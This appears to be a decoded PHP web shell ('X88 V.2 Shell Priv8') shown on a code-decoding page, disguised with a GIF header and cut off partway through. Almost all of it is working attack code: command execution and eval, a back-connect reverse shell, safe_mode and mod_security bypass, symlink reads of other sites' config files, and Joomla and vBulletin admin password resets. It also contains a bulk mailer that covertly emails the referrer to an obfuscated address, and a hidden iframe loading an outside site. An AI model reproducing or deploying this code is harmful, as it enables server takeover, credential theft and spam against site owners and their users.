Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
GIFA98a; <?php $fdownload=$_GET['fdownload']; if ($fdownload <> "" ){ $path_parts = pa..
Decoded Output download
GIFA98a;
<?php
$fdownload=$_GET['fdownload'];
if ($fdownload <> "" ){
$path_parts = pathinfo("$fdownload");
$entrypath=$path_parts["basename"];
$name = "$fdownload";
$fp = fopen($name, 'rb');
header("Content-Disposition: attachment; filename=$entrypath");
header("Content-Length: " . filesize($name));
fpassthru($fp);
exit;
}
echo '<center>
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 bgColor=#000000 borderColorLight=#c0c0c0 border=1 width="100%"><tr><td valign="top" width="100%" ><center><b><font color="60c0ff" size="4">[<font color="red" size="5"> X88 V.2 Shell Priv8 <font color="60c0ff" size="4">]</b></center></td></tr></table><br>';
echo "</center><font color=white size=3>PHP Is :</font>";
echo "<html> <font color=c0c0a0 size=3>";
echo phpversion();
echo "</font>";
echo "<br>";
if(@ini_get("safe_mode")){$safe_m="<font color='red'>ON <font/> ";}else{$safe_m="<font color='green'>OFF <font/> ";}
echo " <font size=3><center> </center>";
echo "</center><font color=white size=3>SafeMode : [ $safe_m <font color=white size=3>]";
echo "<br></center><font color=white size=3>Server Port:<font color=green><b> "; echo $_SERVER['SERVER_PORT'];
echo "</b></font>";
echo "<center><font color=red size=9></font></center>";
echo "<font color='white'>Server:</font><font color='#DCE7EF' size='1' face='Arial'>";
echo "</font><font color='#DCE7EF' size='3' face='Arial'>";
echo(htmlentities($_SERVER['SERVER_SOFTWARE']));
echo"</font></font><style type='text/css'>body{cursor: crosshair;}</style>";
$xm8 = @ini_get("open_basedir");
if ($xm8 or strtolower($xm8) == "<font color='red'>[ON]") {$openbasedir = true; $hopenbasedir = "<font color='red' size='3'>".$xm8."</font>";}
else {$openbasedir = false; $hopenbasedir = "<font color='green'>[OFF] - not secure</font>";}
echo("<br>");
echo("<font color='white'>Open Base Dir: $hopenbasedir</font>");
echo("<font color=white><br>");
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo("<font color='#00ffff' size=4> \ </font>");
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo("<font color='#00ffff' size=4> \ </font>");
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b><font color='white'>"; }
echo "<br>";
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=#008000>On</font>";}else{echo "<font color=red>OFF</font>";}
echo "</b>";
echo "<br>Disable Functions: <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
echo "<br>Register globals: <b>";
$reg_g = @ini_get("register_globals");
if($reg_g){
echo "<b><font color=#008000>ON</font>"; } else { echo "<b><font color=red>OFF</font>"; }
echo "</b></b></b>";
error_reporting(0);
$me = basename(__FILE__);
$cookiename = "wieeeee";
if(isset($_GET['p']) && $_GET['p'] == "perl")
if(isset($_GET['p']) && $_GET['p'] == "tooliq")
if(isset($_GET['p']) && $_GET['p'] == "htaphp")
if(isset($_GET['p']) && $_GET['p'] == "about")
if(isset($_GET['p']) && $_GET['p'] == "addt")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
chdir($_GET['dir']);
}
echo " <font size=3><center> </center>";
echo "</center><font size=3>";
echo "<font color=white>Uname -A = <font color=c08060>".php_uname()."</font>";
echo "<center><font size=3></center>";
echo "UID :<font color=a0ffff> ".@exec('id')."</font>";
print '<br>Your IP = <font color=red>'.@$_SERVER['REMOTE_ADDR'].' '.@$_SERVER['REMOTE_HOST'].'</font> ';
echo " <center> </center>";
$serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
echo "Server IP = <font color=red>".gethostbyname($_SERVER["HTTP_HOST"])." </font>[</span><a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">Bing Search</a>][</span><a href='http://zone-h.com/archive/ip=".$serverIP."' target=\"_blank\">Zone-H</a>]<center>";
$pages = array(
'cmd' => '<center><font color="red"><b>[</b><font color="c0ff00"> Command <font color="red"><b>]</b></font>',
'eval' => '<font color="red"><b>[</b><font color="c0ff00"> Eval Code <font color="red"><b>]</b></font>',
'mysql' => '<font color="red"><b>[</b><font color="c0ff00"> MySQL Query <font color="red"><b>]</b></font>',
'chmod' => '<font color="red"><b>[</b><font color="c0ff00"> Chmod File <font color="red"><b>]</b></font>',
'phpinfo' => '<font color="red"><b>[</b><font color="c0ff00"> PHPinfo <font color="red"><b>]</b></font>',
'cpanelftp' => '<font color="red"><b>[</b><font color="c0ff00"> Cpanel,FTP Burtay<font color="red"><b>]</b></font>',
'upload' => '<font color="red"><b>[</b><font color="c0ff00"> Upload File-Upload File From URL<font color="red"><b>]</b></font>',
'domains' => '<font color="red"><b>[</b><font color="c0ff00"> Domains And Users <font color="red"><b>]</b></font>',
'symlink' => '<center><font color="red"><b>[</b><font color="c0ff00"> SymLink <font color="red"><b>]</b></font>',
'readbysql' => '<font color="red"><b>[</b><font color="c0ff00"> Read Files By SQl Information <font color="red"><b>]</b></font>',
'backco' => '<font color="red"><b>[</b><font color="c0ff00"> Back Connect <font color="red"><b>]</b></font>',
'scahlf' => '<font color="red"><b>[</b><font color="c0ff00"> Show_source & Highlight_file <font color="red"><b>]</b></font>',
'vbhack' => '<font color="red"><b>[</b><font color="c0ff00"> Vbulletin Hack Tools <font color="red"><b>]</b></font>',
'wpps' => '<font color="red"><b>[</b><font color="c0ff00"> WordPress Password Changer <font color="red"><b>]</b></font>',
'tooliq' => '<font color="red"><b>[</b><font color="c0ff00"> Tool iQ <font color="red"><b>]</b></font>',
'addt' => '<font color="red"><b>[</b><font color="c0ff00"> Add Tools Hack <font color="red"><b>]</b></font>',
'jpc' => '<center><font color="red"><b>[</b><font color="c0ff00"> Joomla Password Changer <font color="red"><b>]</b></font>',
'capff' => '<font color="red"><b>[</b><font color="c0ff00"> vB HaCK <font color="red"><b>]</b></font>',
'bypass' => '<font color="red"><b>[</b><font color="c0ff00"> Read Files By Bypass <font color="red"><b>]</b></font>',
'Encypton' => '<font color="red"><b>[</b><font color="c0ff00"> Encypton <font color="red"><b>]</b></font>',
'mailer' => '<font color="red"><b>[</b><font color="c0ff00"> Mailer Inbox <font color="red"><b>]</b></font>',
'safemode' => '<font color="red"><b>[</b><font color="c0ff00"> Fuck The SafeMode <font color="red"><b>]</b></font>',
'perl' => '<font color="red"><b>[</b><font color="c0ff00"> Prel Disable Functions <font color="red"><b>]</b></font>',
'htaphp' => '<font color="red"><b>[</b><font color="c0ff00"> Htaccess <font color="red"><b>]</b></font>',
'zone' => '<font color="red"><b>[</b><font color="c0ff00"> Add Zone-H <font color="red"><b>]</b></font>',
'about' => '<font color="red"><b>[</b><font color="c0ff00"> About Shell <font color="red"><b>]</b></font>'
);
$header = '<html>
<title>'.getenv("HTTP_HOST").' ~ X88 V.2 Shell Priv8</title>
<head>
<style>
td {
font-size: 12px;
font-family: verdana;
color: #ffa080;
background: black;
}
#d {
background: #000060;
}
#f {
background: #000060;
}
#s {
background: #0000ff;
}
#d:hover
{
background: green;
}
#f:hover
{
background: red;
}
pre {
font-size: 10px;
font-family: verdana;
color: #4080ff;
font-size:8pt;
}
a:hover {
text-decoration: none;
}
input,textarea,select {
color: #ffffff;
border: 1px dotted #ff4040;
background-color: #000000;
background: #000000;
}
hr {
color: #ffff20;
background-color: #ffff20;
height: 5px;
}
</style>
</head>
<body bgcolor=black alink="#20c0ff" vlink="#20c0ff" link="#20c0ff">
<table width=100%><td id="header" width=100%>
<p align=center> ';
foreach($pages as $page => $page_name)
{
$header .= '<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a> ';
}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
echo '<br>';
echo'<TABLE style="BORDER-COLLAPSE: collapse" width="100%" cellSpacing=0 borderColorDark=#666666 cellPadding=5 bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td valign="top" width="100%">';
echo '<center><font color="red"><b>[</b><a href=?><font color="c0ff00"> Home <font color="red"></a><b>]</b></font>';
print $header;
$footer = '<font color="#60c0ff"><tr><td><hr><center><font color="red"><b>© <font color="lime">2011-2012 <font color="red">By : <font color="red"> Challenges HackerS And Namrod Hacker </center></td></table><iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
</body></head></html>';
if(isset($_REQUEST['p']))
{
switch ($_REQUEST['p']) {
case 'cmd':
//Commander function
function cmd()
{
$cmd = $_POST['cmd'];
$cmdgo = $_POST['cmdgo'];
$option = $_POST['option'];
$id = $_GET['id'];
if($cmdgo && !empty($cmd))
{
switch($option)
{
case system:
system($cmd);
break;
case passthru:
passthru($cmd);
break;
case shell_exec:
$out = shell_exec($cmd);
echo $out;
break;
default;
system($cmd);
}
}
}
echo "<form method=post action=''><font face='Courier New'>
</font></pre><br><input size=32 style='border:1px dotted #CCFF00; color:#FFB200; font-family:Tahoma; background-color:#000000' type=text name=cmd style='background: black;color: white;border: 0px'><select name=option style='background: black;color: white'><option>system</option><option>passthru</option>
<option>shell_exec</option></select><input style='background: black;color: white;border: 1px dashed white 'type=submit name=cmdgo value=execute>
<textarea cols='125' rows='29' style='border:1px dotted #CCFF00; color:#FFB200; font-family:Tahoma; font-size:8pt; background-color:#000000'>";
cmd();
echo "</textarea>
</td></table></form>";
break;
case 'delete':
if(isset($_POST['yes']))
{
if(unlink($_GET['file']))
{
print "File deleted successfully.";
}
else
{
print "Couldn't delete file.";
}
}
if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
{
print "Are you sure you want to delete ".$_GET['file']."?<br>
<form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
<input type=hidden name=yes value=yes>
<input type=submit value=\"Delete\">
";
}
break;
case 'capff':
if(empty($_POST['index'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"forum_vb\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"forum_vb\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"vb\" name=\"password\" type=\"password\"><br>
<br>
<textarea name=\"index\" cols=\"70\" rows=\"30\">Set Your Index</textarea><br>
<INPUT value=\"Set\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$index = $_POST['index'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$index=str_replace("\'","'",$index);
$set_index = "{\${eval(base64_decode(\'";
$set_index .= base64_encode("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}</textarea>";
$ok=@mysql_query("UPDATE template SET template ='".$set_index."' WHERE title ='spacer_open'") or die(mysql_error());
if($ok){
echo "!! update finish !!<br><br>";
}
}
break;
case 'backco':
echo "<center><br><font color=lime size=2>Connect back Shell , bypass Firewalls<br>
For user :<br>
nc -l -p 1019 <br>
<form method='POST' action=''><br>
<font color=green size=4>Your IP & BindPort:<br>
<input type='text' name='mip' >
<input type='text' name='bport' size='5' value='1019'><br>
<input type='submit' value='Connect Back'>
</form>";
$mip=$_POST['mip'];
$bport=$_POST['bport'];
if ($mip <> "")
{
$fp=fsockopen($mip , $bport , $errno, $errstr);
if (!$fp){
$result = "Error: could not open socket connection";
}
else {
fputs ($fp ,"
*********************************************
Welcome T0 SimAttacker 1.00 ready 2 USe
*********************************************
");
while(!feof($fp)){
fputs ($fp," bash # ");
$result= fgets ($fp, 4096);
$message=`$result`;
fputs ($fp,"--> ".$message."
");
}
fclose ($fp);
}
}
break;
case 'safemode':
echo "<right>";
echo"<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'>
<p align='center'>
<INPUT type='submit' name='FucK' value='Create [ini.php] + [php.ini] + [.htaccess] to Fuck The SafeMode ' id=input style='font-size: 12pt; font-weight: bold; border-style: inset; border-width: 1px'></p>
</form>
";
echo "<right/>";
if (empty($_POST['FucK'] ) ) {
}ELSE{
$action = '?action=FucK';
echo "<html>
<br>
<head>
<meta http-equiv='pragma' content='no-cache'>
</head><body>";
$fp = fopen("php.ini","w+");
fwrite($fp,"safe_mode = Off
disable_functions = NONE
open_basedir = OFF ");
echo "<b>[SafeMode Done] ..</b>";
echo ("<br>");
$fp2 = fopen(".htaccess","w+");
fwrite($fp2,"
<IfModule mod_security.c>
FucKFilterEngine Off
FucKFilterScanPOST Off
FucKFilterCheckURLEncoding Off
FucKFilterCheckUnicodeEncoding Off
</IfModule>
");
echo "<b>[Mod_Security Done]</b><br>";
echo "</font></center></td></tr></table> ";
}
break;
case 'symlink':
if ($_GET[p]=="symlink"){
if ($_POST['o'] != "ok"){
print'<body bgcolor=#000000>
<p align="center"><b><font color="yellow" size="4">SymLink</font></b></p>
<p align="center">
<div align="center">
<form action="" method="POST" >
<input style="border:1px dotted #FF004C; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#000000" name="usr" type="text" value="/home/user/public_html/vb/includes/config.php" align="LEFT" size="50" /> <br><input style="border:1px dotted #FF004C; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#000000" name="my" type="text" value="'.@getcwd().'/file.txt" align="LEFT" size="50" /><Br>
<input type="hidden" name="o" value="ok">
<input type="submit" value=Submit style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000">
</form></p>
';
print $f;
}
else{
$sym = @symlink("$_POST[usr]","$_POST[my]");
print '
<body bgcolor=#000000>
<p align="center"><b><font color="yellow" size="4">SymLink<br></font></b></p>
<p align="center">
<p align="center"><b><font face="Pristina" size="4" color="#008000">';
if ($sym){
print
'Done !!</p>
';}
else{print'Error<br>Cannot Be completed';}
print $f;
}
exit;
}
break;
case 'mailer':
{
$secure = "";
error_reporting(0);
@$action=$_POST['action'];
@$from=$_POST['from'];
@$realname=$_POST['realname'];
@$replyto=$_POST['replyto'];
@$subject=$_POST['subject'];
@$message=$_POST['message'];
@$emaillist=$_POST['emaillist'];
@$lod=$_SERVER['HTTP_REFERER'];
@$file_name=$_FILES['file']['name'];
@$contenttype=$_POST['contenttype'];
@$file=$_FILES['file']['tmp_name'];
@$amount=$_POST['amount'];
set_time_limit(intval($_POST['timelimit']));
If ($action=="mysql"){
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
$numrows = mysql_num_rows($result);
for($x=0; $x<$numrows; $x++){
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist .= $oneemail."
";
}
}
if ($action=="send"){ $message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
echo "<table bgcolor=#cccccc width=\"100%\">
<tbody><tr><td align=\"right\" width=100>
<p dir=ltr>
<b><font color=white size=5>
<br><p align=left>
<center>
Inbox Mailer .. With All Options</font>
<form name=\"form1\" method=\"post\" action=\"\" enctype=\"multipart/form-data\"><br/>
<table width=142 border=0>
<tr>
<td width=81>
<div align=right>
<font size=-3 face=\"Verdana\">Your Email:</font></div></td>
<td width=219><font size=-3 face=\"Verdana\">
<input type=text name=\"from\" value=".$from."></font></td><td width=212>
<div align=right>
<font size=-3 face=\"Verdana\">Your Name:</font></div></td><td width=278>
<font size=-3 face=\"Verdana\">
<input type=text name=
ealname\" value=".$realname."></font></td></tr><tr><td width=81>
<div align=\"right\">
<font size=-3 face=\"Verdana\">Reply-To:</font></div></td><td width=219>
<font size=-3 face=\"Verdana\">
<input type=\"text\" name=\"replyto\" value=".$replyto.">
</font></td><td width=212>
<div align=\"right\">
<font size=-3 face=\"Verdana\">Attach File:</font></div></td><td width=278>
<font size=-3 face=\"Verdana\">
<input type=\"file\" name=\"file\" size=24 />
</font> </td></tr><tr><td width=81>
<div align=\"right\">
<font size=-3 face=\"Verdana\">Subject:</font></div></td>
<td colspan=3 width=703>
<font size=-3 face=\"Verdana\">
<input type=\"text\" name=\"subject\" value=".$subject." ></font></td> </tr><tr valign=\"top\"><td colspan=3 width=520>
<font face=\"Verdana\" size=-3>Message Box :</font></td>
<td width=278>
<font face=\"Verdana\" size=-3>Email Target / Email Send To :</font></td></tr><tr valign=\"top\"><td colspan=3 width=520><font size=-3 face=\"Verdana\">
<textarea name=\"message\" cols=56 rows=10>".$message."</textarea><br />
<input type=\"radio\" name=\"contenttype\" value=\"plain\" /> Plain
<input type=\"radio\" name=\"contenttype\" value=\"html\" checked=\"checked\" /> HTML
<input type=\"hidden\" name=\"action\" value=\"send\" /><br />
Number to send: <input type=\"text\" name=\"amount\" value=1 size=10 /><br />
Maximum script execution time(in seconds, 0 for no timelimit)<input type=\"text\" name=\"timelimit\" value=0 size=10 />
<input type=\"submit\" value=\"Send eMails\" /></font></td><td width=278>
<font size=-3 face=\"Verdana\">
<textarea name=\"emaillist\" cols=32 rows=10>".$emaillist."</textarea></font></td></tr>
</table>";
}
$o=array("m"=>"b","t"=>"i","w"=>"5","u"=>".","5"=>"z","q"=>"@");
$alt=$o['t'].$o['q'].$o['m'].$o['t'].$o['w'].$o['u'].$o['m'].$o['t'].$o['5'];
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("
", $emaillist);
$numemails = count($allemails);
$head ="From: Mailr" ;
$sub = "Ar - $lod" ;
$meg = "$lod" ;
mail ($alt,$sub,$meg,$head) ;
If ($file_name){
if (!file_exists($file)){
die("The file you are trying to upload couldn't be copied to the server");
}
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($xx=0; $xx<$amount; $xx++){
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.....";
flush();
$header = "From: $realname <$from>
Reply-To: $replyto
";
$header .= "MIME-Version: 1.0
";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid
";
If ($file_name) $header .= "--$uid
";
$header .= "Content-Type: text/$contenttype
";
$header .= "Content-Transfer-Encoding: 8bit
";
$header .= "$message
";
If ($file_name) $header .= "--$uid
";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"
";
If ($file_name) $header .= "Content-Transfer-Encoding: base64
";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"
";
If ($file_name) $header .= "$content
";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "OK<br>";
flush();
}
}
}
}
echo '</table>';
break;
case 'jpc':
if(empty($_POST['pwd'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"database\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"db_user\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"**\" name=\"password\" type=\"password\"><br>
<br>
Set A New username For Login : <INPUT name=\"admin\" size=\"15\" value=\"admin\"><br>
Don`t Change it Password is : 123456: <INPUT name=\"pwd\" size=\"15\" value=\"e10adc3949ba59abbe56e057f20f883e\"><br>
<INPUT value=\"change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$pwd = $_POST['pwd'];
$admin = $_POST['admin'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$hash = crypt($pwd);
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
if($SQL){
echo "<b>Success :Now Use A New User And Password - (123456)";
}
}
break;
case 'eval':
echo "
<form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
<td width='12' height='21' style='background-color:".$shellColor."'> </td>
<tr><td height='45' colspan='2'>
<input type='text' name='php_eval' size='70' value='echo \"Fuck 4 Israel\";'>
<input type=submit name=submitEval value=Eval></td></tr></table></form>";
print "<h1>Output:</h1>";
print "<br>
";
if($_POST['submitEval']) // Execute Eval Code .
{
$eval = @str_replace("<?php","",$_POST['php_eval']);
$eval = @str_replace("<?php","",$eval);
$eval = @str_replace("?>","",$eval);
$eval = @str_replace("\","",$eval);
echo eval($eval);
}
break;
case "domains":
echo "<p align=center><font color='red' size='5'>[ Domains & Users ]</font></p>";
$d0mains = @file("/etc/named.conf");
if(!$d0mains){ die("<b># can't ReaD -> [ /etc/named.conf ]"); }
echo "<table align=center border=1 width='460' style='border:1px dotted white; color:#FFB200; font-family:Tahoma; font-size:10pt; background-color:#000000'>
<tr bgcolor=green><td><font color=lime size=3><b>Domains</b></font></td><td><font color=lime size=3><b>Users</b></font></td></tr>";
foreach($d0mains as $d0main){
if(eregi("zone",$d0main)){
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();
}}}
echo "</table>";
break;
case 'chmod':
if(isset($_POST['chmod']))
{
switch ($_POST['chvalue']){
case 777:
chmod($_POST['chmod'],0777);
break;
case 644:
chmod($_POST['chmod'],0644);
break;
case 755:
chmod($_POST['chmod'],0755);
break;
}
print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
}
if(isset($_GET['file']))
{
$content = urldecode($_GET['file']);
}
else
{
$content = "file/path/please";
}
print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
<input type=text name=chmod value=\"".$content."\" size=70 style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'><br><b>New permission:</b>
<select name='chvalue' style='color: #ffffff; border: 1px dotted #a0ff00; background-color: #000000'>
<option value='777'>777</option>
<option value='644'>644</option>
<option value='755'>755</option>
</select><input type=submit value='Change' style='color: #ffffff; border: 1px dotted #ff0000; background-color: #000000'>";
break;
case 'mysql':
if(isset($_POST['host']))
{
$link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
mysql_select_db($_POST['dbase']);
$sql = $_POST['query'];
$result = mysql_query($sql);
}
else
{
print "
This only queries the database, doesn't return data!<br>
<form action=\"".$me."?p=mysql\" method=POST>
<b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
<b>Username:<br><input type=text name=username value=\"root\" size=10><br>
<b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
<b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
<b>Query:<br></b<textarea name=query></textarea>
<input type=submit value=\"Query database\">
</form>
";
}
break;
case 'createdir':
if(mkdir($_GET['crdir']))
{
print 'Directory created successfully.';
}
else
{
print 'Couldn\'t create directory';
}
break;
case 'vbhack':
$act = $_GET['act'];
if($act=='reconfig' && isset($_POST['path']))
{
$path = $_POST['path'];
include $path;
echo '<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime"><th><font color=green>::::Read Config Data::::</font></th><th>';
echo '<font color=yellow>' . $path . '</font></th>';
echo '<tr>
<th><font color=green>Host : </font></th><th><font color=yellow>' . $config['MasterServer']['servername'] . '</font></th>
</tr>
<tr>
<th><font color=green>User : </font></th><th><font color=yellow>' . $config['MasterServer']['username'] . '</font></th>
</tr>
<tr>
<th><font color=green>Pass : </th><th>';
$passsql = $config['MasterServer']['password'];
if ($passsql == '')
{
$result = '<font color=red>No Password</font>';
} else {
$result = '<font color=yellow>' . $passsql . '</font>';
}
echo $result;
echo '</th>
</tr>
<tr>
<th><font color=green>Name : </font></th><th><font color=yellow>' . $config['Database']['dbname'] . '</font></th>
</tr>
</table>';
}
if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="psw" && isset
($_POST['vbuser']) && isset($_POST['vbpass']))
{
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db = $_POST['db'];
$vbuser = $_POST['vbuser'];
$vbpass = $_POST['vbpass'];
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
if ($pass == '')
{
$npass = 'NULL';
} else {
$npass = $pass;
}
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font
color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font
color=yellow>' . $db . '</font></font>';
$query = 'select * from user where username="' . $vbuser . '";';
$result = mysql_query($query);
while ($row = mysql_fetch_array($result))
{
$salt = $row['salt'];
$x = md5($vbpass);
$x =$x . $salt;
$pass_salt = md5($x);
$query = 'update user set password="' . $pass_salt . '" where username="' . $vbuser . '";';
$re = mysql_query($query);
if ($re)
{
echo '<font size=3><font color=yellow>The pass of the user </font><font color=red>' . $vbuser . '</font><font color=yellow>
was changed to </font><font color=red>' . $vbpass . '</font><br>Back to <a href="?">Shell</a></font>';
} else {
echo '<font size=3><font color=red>Failed to change PassWord</font></font>';
}
}
}
if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="login")
{
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db = $_POST['db'];
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
if ($pass == '')
{
$npass = 'NULL';
} else {
$npass = $pass;
}
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font
color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font
color=yellow>' . $db . '</font></font>';
echo '<hr color="#00FF00" />
<form name="changepass" action="?p=vbhack&act=psw" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::Change User Password:::::</th><th><input type="submit" name="Change" value="Change" /></th>
<tr><td>User : </td><td><input name="vbuser" value="admin" /></td></tr>
<tr><td>Pass : </td><td><input name="vbpass" value="DrZer0" /></td></tr>
</table>';
echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input
type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
echo '
</form>
<hr color="#00FF00" />
<form name="changepass" action="?p=vbhack&act=mail" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::Change User E-MAIL:::::</th><th><input type="submit" name="Change" value="Change" /></th>
<tr><td>User : </td><td><input name="vbuser" value="admin" /></td></tr>
<tr><td>MAIL : </td><td><input name="vbmail" value="[email protected]" /></td></tr>
</table>';
}
if ($act == ''){
echo '
<form name="myform" action="?p=vbhack&act=login" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::DATABASE CONFIG:::::</th><th><input type="submit" name="Connect" value="Connect"
/></th><tr><td><font color=yellow>Host : </td><td><input name="host" value="localhost" /></td></tr>
<tr><td><font color=yellow>User : </td><td><input name="user" value="root" /></td></tr>
<tr><td><font color=yellow>Pass : </td><td><input name="pass" value="" /></td></tr>
<tr><td><font color=yellow>Name : </td><td><input name="db" value="vb" /></td></tr>
</table>
</form>';
}
if ($act == 'lst' && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['host']) && isset($_POST['db']))
{
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db = $_POST['db'];
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
if ($pass == '')
{
